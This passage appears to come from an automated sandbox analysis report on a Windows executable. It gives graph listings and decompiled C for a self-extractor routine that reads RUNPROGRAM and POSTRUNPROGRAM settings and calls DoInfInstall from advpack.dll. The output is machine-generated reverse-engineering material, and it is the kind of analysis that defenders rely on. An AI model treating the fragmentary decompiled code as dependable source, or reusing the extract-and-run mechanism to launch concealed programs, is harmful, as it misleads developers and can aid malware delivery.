3083->3072 3102 a066ae GetFileAttributesA 3084->3102 3086 a0477b 3086->3069 3087 a047cc SetFileAttributesA 3089 a047db 3087->3089 3089->3069 3090 a06517 24 API calls 3091 a047b1 3090->3091 3091->3087 3091->3089 3092 a047c2 3091->3092 3092->3087 3094 a047f6 3093->3094 3095 a0480f LocalAlloc 3093->3095 3096 a044b9 20 API calls 3094->3096 3098 a04831 3095->3098 3101 a0480b 3095->3101 3096->3101 3099 a044b9 20 API calls 3098->3099 3100 a04846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a04777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a04ad0 3112 a03680 3104->3112 3107 a04ae9 3108 a04aee WriteFile 3109 a04b0f 3108->3109 3110 a04b14 3108->3110 3110->3109 3111 a04b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a03691 MsgWaitForMultipleObjects 3112->3113 3114 a036e8 3113->3114 3115 a036a9 PeekMessageA 3113->3115 3114->3107 3114->3108 3115->3113 3118 a036bc 3115->3118 3116 a036c7 DispatchMessageA 3117 a036d1 PeekMessageA 3116->3117 3117->3118 3118->3113 3118->3114 3118->3116 3118->3117 3210 a03210 3211 a03227 3210->3211 3235 a0328e EndDialog 3210->3235 3212 a033e2 GetDesktopWindow 3211->3212 3213 a03235 3211->3213 3215 a043d0 11 API calls 3212->3215 3216 a03239 3213->3216 3218 a0324c 3213->3218 3219 a032dd GetDlgItemTextA 3213->3219 3217 a033f1 SetWindowTextA SendDlgItemMessageA 3215->3217 3217->3216 3220 a0341f GetDlgItem EnableWindow 3217->3220 3221 a03251 3218->3221 3222 a032c5 EndDialog 3218->3222 3225 a032fc 3219->3225 3242 a03366 3219->3242 3220->3216 3221->3216 3223 a0325c LoadStringA 3221->3223 3222->3216 3226 a03294 3223->3226 3227 a0327b 3223->3227 3224 a044b9 20 API calls 3224->3216 3230 a03331 GetFileAttributesA 3225->3230 3225->3242 3248 a04224 LoadLibraryA 3226->3248 3231 a044b9 20 API calls 3227->3231 3233 a0337c 3230->3233 3234 a0333f 3230->3234 3231->3235 3232 a032a5 SetDlgItemTextA 3232->3216 3232->3227 3236 a0658a CharPrevA 3233->3236 3237 a044b9 20 API calls 3234->3237 3235->3216 3238 a0338d 3236->3238 3239 a03351 3237->3239 3240 a058c8 27 API calls 3238->3240 3239->3216 3241 a0335a CreateDirectoryA 3239->3241 3243 a03394 3240->3243 3241->3233 3241->3242 3242->3224 3243->3242 3244 a033a4 3243->3244 3245 a033c7 EndDialog 3244->3245 3246 a0597d 34 API calls 3244->3246 3245->3216 3247 a033c3 3246->3247 3247->3216 3247->3245 3249 a04246 GetProcAddress 3248->3249 3252 a043b2 3248->3252 3250 a043a4 FreeLibrary 3249->3250 3251 a0425d GetProcAddress 3249->3251 3250->3252 3251->3250 3253 a04274 GetProcAddress 3251->3253 3254 a044b9 20 API calls 3252->3254 3253->3250 3255 a0428b 3253->3255 3256 a0329d 3254->3256 3257 a04295 GetTempPathA 3255->3257 3262 a042e1 3255->3262 3256->3216 3256->3232 3258 a042ad 3257->3258 3258->3258 3259 a042b4 CharPrevA 3258->3259 3260 a042d0 CharPrevA 3259->3260 3259->3262 3260->3262 3261 a04390 FreeLibrary 3261->3256 3262->3261 3263 a04a50 3264 a04a66 3263->3264 3265 a04a9f ReadFile 3263->3265 3266 a04abb 3264->3266 3267 a04a82 memcpy 3264->3267 3265->3266 3267->3266 3268 a03450 3269 a034d3 EndDialog 3268->3269 3270 a0345e 3268->3270 3271 a0346a 3269->3271 3272 a0349a GetDesktopWindow 3270->3272 3276 a03465 3270->3276 3273 a043d0 11 API calls 3272->3273 3274 a034ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a0348c EndDialog 3275->3271 3276->3271 3276->3275

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_00A055A0 15 Function_00A044B9 0->15 21 Function_00A01781 0->21 23 Function_00A06285 0->23 25 Function_00A0658A 0->25 27 Function_00A0468F 0->27 37 Function_00A06CE0 0->37 76 Function_00A02630 0->76 90 Function_00A06517 0->90 101 Function_00A05467 0->101 110 Function_00A0597D 0->110 117 Function_00A06952 0->117 1 Function_00A04CA0 2 Function_00A053A1 20 Function_00A01680 2->20 2->25 2->37 94 Function_00A0171E 2->94 3 Function_00A06FA1 4 Function_00A03BA2 4->15 4->21 4->23 4->27 31 Function_00A06495 4->31 4->37 43 Function_00A01AE8 4->43 49 Function_00A03FEF 4->49 74 Function_00A0202A 4->74 102 Function_00A02267 4->102 5 Function_00A072A2 6 Function_00A018A3 6->37 48 Function_00A017EE 6->48 7 Function_00A06FA5 114 Function_00A0724D 7->114 8 Function_00A01EA7 104 Function_00A0256D 8->104 9 Function_00A02CAA 9->6 9->15 9->27 28 Function_00A02390 9->28 34 Function_00A05C9E 9->34 9->37 47 Function_00A036EE 9->47 9->90 10 Function_00A02AAC 10->20 10->37 45 Function_00A065E8 10->45 65 Function_00A017C8 10->65 11 Function_00A066AE 12 Function_00A069B0 16 Function_00A06FBE 12->16 50 Function_00A071EF 12->50 82 Function_00A07000 12->82 107 Function_00A06C70 12->107 13 Function_00A016B3 13->21 14 Function_00A052B6 14->21 14->28 14->37 41 Function_00A01FE1 14->41 14->45 15->20 15->37 66 Function_00A067C9 15->66 15->94 95 Function_00A0681F 15->95 118 Function_00A06F54 16->118 17 Function_00A06380 18 Function_00A03680 19 Function_00A04980 19->15 109 Function_00A0487A 19->109 20->21 22 Function_00A01A84 111 Function_00A0667F 22->111 24 Function_00A02A89 25->13 26 Function_00A0268B 26->15 26->37 26->94 28->13 28->20 28->25 28->28 28->37 29 Function_00A01F90 29->8 29->15 29->37 30 Function_00A06793 31->21 31->25 31->37 32 Function_00A06298 32->37 32->94 33 Function_00A04E99 33->20 34->15 34->20 34->25 36 Function_00A031E0 34->36 34->37 64 Function_00A066C8 34->64 75 Function_00A06E2A 34->75 89 Function_00A05C17 34->89 34->111 35 Function_00A04FE0 35->15 35->27 57 Function_00A04EFD 35->57 52 Function_00A06CF0 37->52 38 Function_00A024E0 38->25 38->37 39 Function_00A019E0 39->37 69 Function_00A043D0 39->69 40 Function_00A047E0 40->15 40->20 42 Function_00A051E5 42->15 42->23 42->27 43->10 43->13 43->15 43->20 43->21 43->22 43->25 43->37 43->64 43->94 44 Function_00A028E8 44->24 108 Function_00A02773 44->108 46 Function_00A070EB 47->15 47->24 47->37 47->44 47->66 47->95 48->37 49->15 49->23 49->37 91 Function_00A0411B 49->91 51 Function_00A06BEF 53 Function_00A034F0 53->15 53->18 53->69 54 Function_00A06EF0 55 Function_00A066F9 56 Function_00A02BFB 56->9 56->14 56->29 92 Function_00A02F1D 56->92 57->19 57->37 96 Function_00A04B60 57->96 58 Function_00A070FE 59 Function_00A04CC0 60 Function_00A04BC0 61 Function_00A030C0 62 Function_00A063C0 62->21 62->25 62->37 63 Function_00A058C8 63->15 63->20 63->23 63->25 113 Function_00A06648 64->113 66->30 67 Function_00A04AD0 67->18 68 Function_00A04CD0 68->19 68->33 68->37 68->40 77 Function_00A04C37 68->77 83 Function_00A04702 68->83 68->96 105 Function_00A0476D 68->105 69->37 70 Function_00A07120 71 Function_00A06A20 72 Function_00A04224 72->15 72->20 73 Function_00A03B26 73->32 73->35 73->90 74->15 74->25 74->37 74->94 75->52 76->15 76->37 78 Function_00A03A3F 78->15 78->23 78->27 78->90 79 Function_00A06C3F 80 Function_00A03100 80->69 81 Function_00A04200 83->13 83->20 84 Function_00A06C03 84->114 85 Function_00A07208 86 Function_00A0490C 87 Function_00A07010 88 Function_00A03210 88->15 88->25 88->63 88->69 88->72 88->110 90->15 91->8 92->0 92->4 92->15 92->23 92->25 92->37 92->42 92->73 92->78 93 Function_00A0621E 92->93 100 Function_00A05164 92->100 103 Function_00A04169 92->103 92->104 93->15 93->23 93->37 93->110 95->37 95->55 97 Function_00A06A60 97->56 97->79 97->85 98 Function_00A07060 97->98 97->114 119 Function_00A07155 97->119 98->70 98->87 99 Function_00A06760 100->15 100->27 100->32 101->2 101->20 101->21 101->23 101->25 101->37 101->63 101->110 102->25 102->37 102->94 103->15 103->27 104->38 105->11 105->90 106 Function_00A07270 108->20 108->21 108->25 108->37 109->86 110->15 110->23 110->26 110->37 111->113 112 Function_00A06F40 115 Function_00A04A50 116 Function_00A03450 116->69 118->85 118->114

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 a03ba2-a03bd9 37 a03bdb-a03bee call a0468f 36->37 38 a03bfd-a03bff 36->38 44 a03d13-a03d30 call a044b9 37->44 45 a03bf4-a03bf7 37->45 40 a03c03-a03c28 memset 38->40 42 a03d35-a03d48 call a01781 40->42 43 a03c2e-a03c40 call a0468f 40->43 49 a03d4d-a03d52 42->49 43->44 54 a03c46-a03c49 43->54 55 a03f4d 44->55 45->38 45->44 52 a03d54-a03d6c call a0468f 49->52 53 a03d9e-a03db6 call a01ae8 49->53 52->44 65 a03d6e-a03d75 52->65 53->55 69 a03dbc-a03dc2 53->69 54->44 57 a03c4f-a03c56 54->57 59 a03f4f-a03f63 call a06ce0 55->59 61 a03c60-a03c65 57->61 62 a03c58-a03c5e 57->62 67 a03c75-a03c7c 61->67 68 a03c67-a03c6d 61->68 66 a03c6e-a03c73 62->66 71 a03fda-a03fe1 65->71 72 a03d7b-a03d98 CompareStringA 65->72 73 a03c87-a03c89 66->73 67->73 76 a03c7e-a03c82 67->76 68->66 74 a03dc4-a03dce 69->74 75 a03de6-a03de8 69->75 80 a03fe3 call a02267 71->80 81 a03fe8-a03fea 71->81 72->53 72->71 73->49 77 a03c8f-a03c98 73->77 74->75 82 a03dd0-a03dd7 74->82 78 a03f0b-a03f15 call a03fef 75->78 79 a03dee-a03df5 75->79 76->73 84 a03cf1-a03cf3 77->84 85 a03c9a-a03c9c 77->85 96 a03f1a-a03f1c 78->96 86 a03fab-a03fd2 call a044b9 LocalFree 79->86 87 a03dfb-a03dfd 79->87 80->81 81->59 82->75 83 a03dd9-a03ddb 82->83 83->79 90 a03ddd-a03de1 call a0202a 83->90 84->53 95 a03cf9-a03d11 call a0468f 84->95 92 a03ca5-a03ca7 85->92 93 a03c9e-a03ca3 85->93 86->55 87->78 94 a03e03-a03e0a 87->94 90->75 92->55 102 a03cad 92->102 101 a03cb2-a03cc5 call a0468f 93->101 94->78 103 a03e10-a03e19 call a06495 94->103 95->44 95->49 97 a03f46-a03f47 LocalFree 96->97 98 a03f1e-a03f2d LocalFree 96->98 97->55 105 a03f33-a03f3b 98->105 106 a03fd7-a03fd9 98->106 101->44 112 a03cc7-a03ce8 CompareStringA 101->112 102->101 113 a03f92-a03fa9 call a044b9 103->113 114 a03e1f-a03e36 GetProcAddress 103->114 105->40 106->71 112->84 115 a03cea-a03ced 112->115 123 a03f7c-a03f90 LocalFree call a06285 113->123 116 a03f64-a03f76 call a044b9 FreeLibrary 114->116 117 a03e3c-a03e80 114->117 115->84 116->123 121 a03e82-a03e87 117->121 122 a03e8b-a03e94 117->122 121->122 125 a03e96-a03e9b 122->125 126 a03e9f-a03ea2 122->126 123->55 125->126 127 a03ea4-a03ea9 126->127 128 a03ead-a03eb6 126->128 127->128 130 a03ec1-a03ec3 128->130 131 a03eb8-a03ebd 128->131 133 a03ec5-a03eca 130->133 134 a03ece-a03eec 130->134 131->130 133->134 137 a03ef5-a03efd 134->137 138 a03eee-a03ef3 134->138 139 a03f40 FreeLibrary 137->139 140 a03eff-a03f09 FreeLibrary 137->140 138->137 139->97 140->98
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A03BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0xa09124 =  *0xa09124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0xa08a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0xa08c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E00A0468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00A01AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00A06CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00A03FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0xa08580;
                                                                                                                                                                                                                                            													if( *0xa08580 != 0) {
                                                                                                                                                                                                                                            														E00A02267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0xa08180;
                                                                                                                                                                                                                                            											if( *0xa08180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0xa09124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa09a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00A06495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa08a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0xa09a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0xa08a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0xa09154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0xa091e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0xa08a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0xa09a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0xa08d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0xa09a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0xa0a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0xa09124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa09a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa08a20;
                                                                                                                                                                                                                                            										if( *0xa08a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E00A0202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E00A0468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa08c42;
                                                                                                                                                                                                                                            									if( *0xa08c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0xa08a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A0468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A0468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00A01781( &_v276, 0x104, _t130, 0xa08c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
